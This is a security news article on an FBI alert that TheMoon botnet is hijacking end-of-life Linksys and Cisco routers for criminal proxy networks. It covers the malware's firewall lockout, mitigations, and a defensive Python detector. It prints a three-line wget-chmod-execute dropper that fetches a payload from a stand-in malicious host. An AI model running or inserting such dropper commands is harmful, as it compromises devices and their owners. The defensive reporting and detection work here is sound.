FBI Alerts Public to Cybercriminals Exploiting Outdated Routers for Illicit Activities

The Federal Bureau of Investigation (FBI) has issued a critical public service announcement, highlighting that cybercriminals are actively exploiting outdated routers to establish extensive proxy networks for concealing their illicit activities. This development underscores the pressing need for individuals and organizations to assess and upgrade their network infrastructure to mitigate potential security risks.

Targeted Router Models and Associated Risks

The FBI’s recent FLASH report identifies thirteen specific router models, primarily older Linksys devices sold under the Cisco brand, that are currently being targeted:

– Linksys E1200, E2500, E3200
– Cisco Linksys E1000, E1500, E1550, E4200, WRT610N
– Cradlepoint E300, E100
– Cisco M10
– Linksys WRT320N, WRT310N

These models, many of which date back to 2010 or earlier, no longer receive software updates from their manufacturers. This lack of support renders them vulnerable to exploitation by cyber actors who can leverage known vulnerabilities to compromise these devices.

TheMoon Malware Botnet: A Resurgent Threat

A significant factor in these attacks is the resurgence of TheMoon, a router botnet first identified in 2014. The malware needs no valid credentials to infect a device: it scans for exposed ports, sends commands that abuse the unpatched service listening there, and then waits for instructions from command-and-control servers run by its operators.

Once installed, TheMoon drops a payload named .nttpd, which writes a process identifier (PID) file carrying the malware's version number (currently 26). It then adds iptables rules that drop incoming TCP traffic on ports 80 and 8080 (normally the router's web management interface) except from a small set of attacker-chosen IP ranges. The effect is to lock anyone not on that allow-list, rival attackers included, out of the management interface while preserving the operators' own access.

Implications of Compromised Routers

The FBI has linked these compromised routers to services like Anyproxy and 5Socks, which were recently seized by authorities. These services sold access to the hijacked devices as proxy networks, allowing criminals to mask their true IP addresses.

By routing their internet traffic through these compromised routers, cybercriminals can conduct various illicit activities, including:

– Cryptocurrency theft
– Fraudulent transactions
– Accessing illegal services

This anonymity makes it challenging for law enforcement agencies to trace and apprehend the perpetrators.

Technical Exploitation Methods

Attackers either exploit vulnerabilities in outdated firmware or brute-force weak or default credentials to gain access to these routers. One example of the class (a model that is not in the FBI list above) is CVE-2020-17456 in the Seowon SLR-120 router, which allows unauthenticated remote code execution through crafted POST requests to the router's system_log.cgi endpoint.

Once a foothold is gained, the dropper sequence typically looks like this:

```bash
# Typical download-and-execute dropper: fetch the payload into the writable
# /tmp filesystem, mark it executable, then run it.
wget http://malicious-server.com/payload -O /tmp/payload
chmod +x /tmp/payload
/tmp/payload
```

These commands download and execute the malicious payload that establishes persistent control over the device.

Recommendations for Mitigation

To defend against these attacks, the FBI recommends the following actions:

1. Replace End-of-Life Routers: Immediately replace outdated routers with newer, supported models that receive regular firmware updates.

2. Apply Firmware and Security Updates: Ensure that all available firmware and security updates are promptly applied to network devices.

3. Disable Remote Administration: Turn off remote administration features through router settings to reduce exposure to external threats.

4. Implement Strong, Unique Passwords: Use robust passwords (16-64 characters) for router access and change them regularly.

5. Regularly Reboot Routers: Reboot routers periodically to clear malware that lives only in memory. A reboot does not remove an implant that has been written to flash, so it is a stopgap, not a substitute for replacing the device.

Signs of Compromise

Be vigilant for indicators that a router may be compromised, such as:

– Overheating
– Unexpected changes in settings
– Intermittent connectivity issues

If any of these signs are observed, it is crucial to take immediate action to secure the network.
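The iptables and PID-file behaviour described in the TheMoon section above can be checked directly when you have a shell on the router (or a copy of its `iptables-save` output). The script below is an added example, not code from the FBI notice or from any vendor: it parses `iptables-save` rules for the allow-then-drop pattern on ports 80 and 8080 and looks for the .nttpd PID file. The exact PID file name form (`.nttpd,pid-<version>`) and the candidate directories are assumptions; both sample rule sets are constructed and use RFC 5737 documentation address ranges.

```python
"""Offline triage for TheMoon indicators (added example; assumptions noted inline)."""
import os
import re
from dataclasses import dataclass
from typing import Iterable, Optional

# Ports the notice says TheMoon drops inbound TCP on (web management ports).
MOON_DROP_PORTS = ("80", "8080")
# Assumed file-name form for the payload's PID file; the version is the suffix.
PID_FILE_RE = re.compile(r"^\.nttpd,pid-(\d+)$")
# Directories to look in on a live device (assumption; adjust per firmware).
PID_DIRS = ("/var/run", "/var/tmp", "/tmp")


@dataclass
class Rule:
    chain: str
    target: str
    proto: Optional[str] = None
    dport: Optional[str] = None
    src: Optional[str] = None


def parse_iptables_save(text: str) -> list[Rule]:
    """Parse '-A CHAIN ...' lines from iptables-save; other lines are ignored.
    Negated matches ('! -s ...') are not handled; treat them as manual review."""
    rules: list[Rule] = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 2 or tokens[0] != "-A":
            continue  # table name, chain policy, COMMIT, comments
        rule = Rule(chain=tokens[1], target="")
        i = 2
        while i + 1 < len(tokens):
            flag, value = tokens[i], tokens[i + 1]
            if flag in ("-p", "--protocol"):
                rule.proto = value
            elif flag in ("-s", "--source", "--src"):
                rule.src = value
            elif flag in ("--dport", "--destination-port"):
                rule.dport = value
            elif flag in ("-j", "--jump"):
                rule.target = value
            i += 1  # one token at a time, so unknown matchers like '-m tcp' are skipped
        if rule.target:
            rules.append(rule)
    return rules


def moon_firewall_findings(rules: Iterable[Rule]) -> dict[str, list[str]]:
    """Return {port: [allowed source ranges]} for each TheMoon port that has an
    unrestricted INPUT DROP rule *and* source-restricted ACCEPT rules.
    A bare DROP on 80/8080 alone is common on legitimate WAN rules, so the
    allow-list is what makes the pattern suspicious."""
    rules = list(rules)
    findings: dict[str, list[str]] = {}
    for port in MOON_DROP_PORTS:
        on_port = [r for r in rules
                   if r.chain == "INPUT" and r.dport == port and r.proto in (None, "tcp")]
        dropped = any(r.target == "DROP" and r.src is None for r in on_port)
        allowed = [r.src for r in on_port if r.target == "ACCEPT" and r.src]
        if dropped and allowed:
            findings[port] = allowed
    return findings


def moon_pid_files(names: Iterable[str]) -> list[tuple[str, int]]:
    """Match file names against the assumed .nttpd PID file form."""
    hits: list[tuple[str, int]] = []
    for name in names:
        m = PID_FILE_RE.match(name)
        if m:
            hits.append((name, int(m.group(1))))
    return hits


def list_dirs(dirs: Iterable[str]) -> list[str]:
    """File names from whichever candidate directories exist on the live device."""
    names: list[str] = []
    for d in dirs:
        try:
            names.extend(os.listdir(d))
        except OSError:
            pass
    return names


def assess(iptables_text: str, file_names: Iterable[str]) -> list[str]:
    """Human-readable findings; an empty list means no TheMoon indicator seen."""
    out: list[str] = []
    for port, allowed in moon_firewall_findings(parse_iptables_save(iptables_text)).items():
        out.append(f"INPUT drops tcp/{port} except from {', '.join(allowed)}")
    for name, version in moon_pid_files(file_names):
        out.append(f"PID file {name} present (TheMoon version {version})")
    return out


# Constructed samples, not real captures. Addresses are RFC 5737 ranges.
SUSPECT_IPTABLES = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -s 203.0.113.0/24 -p tcp -m tcp --dport 8080 -j ACCEPT
-A INPUT -s 198.51.100.0/24 -p tcp -m tcp --dport 8080 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 8080 -j DROP
-A INPUT -s 203.0.113.0/24 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j DROP
COMMIT
"""

# Legitimate shape: LAN bridge may reach the admin UI, everything else is dropped.
CLEAN_IPTABLES = """\
*filter
:INPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -i br0 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j DROP
COMMIT
"""

if __name__ == "__main__":
    print("suspect:", assess(SUSPECT_IPTABLES, [".nttpd,pid-26", "dnsmasq.pid"]))
    print("clean:  ", assess(CLEAN_IPTABLES, ["dnsmasq.pid"]))
    print("this host:", assess("", list_dirs(PID_DIRS)))
```

On a real device, feed it the output of `iptables-save` and the names from the PID directories; a match is a reason to pull the device offline and replace it, since TheMoon targets hardware that will never receive a fix. The check deliberately keys on the source allow-list rather than the DROP rule alone, because dropping inbound 80/8080 on the WAN side is normal router behaviour.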

Broader Context: The Growing Threat to End-of-Life Routers

The exploitation of end-of-life routers is not an isolated incident. Various manufacturers have reported similar issues:

– Zyxel: In February 2025, Zyxel confirmed that multiple end-of-life products were vulnerable to actively exploited flaws. The company advised users to replace these devices with newer models for optimal protection. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/zyxel-wont-patch-newly-exploited-flaws-in-end-of-life-routers/?utm_source=openai))

– Cisco: In January 2023, Cisco disclosed that over 19,000 end-of-life VPN routers were exposed to remote command execution attacks. The company recommended disabling remote management and blocking specific ports as mitigation measures. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/over-19-000-end-of-life-cisco-routers-exposed-to-rce-attacks/?utm_source=openai))

– D-Link: In November 2024, D-Link urged customers to retire end-of-life VPN routers impacted by a critical unauthenticated remote code execution vulnerability. The company emphasized that no security updates would be released for these devices. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/d-link-urges-users-to-retire-vpn-routers-impacted-by-unfixed-rce-flaw/?utm_source=openai))

These instances highlight a recurring pattern where outdated networking equipment becomes a prime target for cybercriminals. The lack of manufacturer support and security updates for end-of-life devices creates significant vulnerabilities that can be exploited for various malicious purposes.

Conclusion

The FBI’s warning serves as a stark reminder of the critical importance of maintaining up-to-date network infrastructure. Outdated routers not only pose a risk to individual users but also contribute to broader cybersecurity threats when compromised. By proactively replacing end-of-life devices and adhering to recommended security practices, individuals and organizations can significantly reduce their exposure to these evolving cyber threats.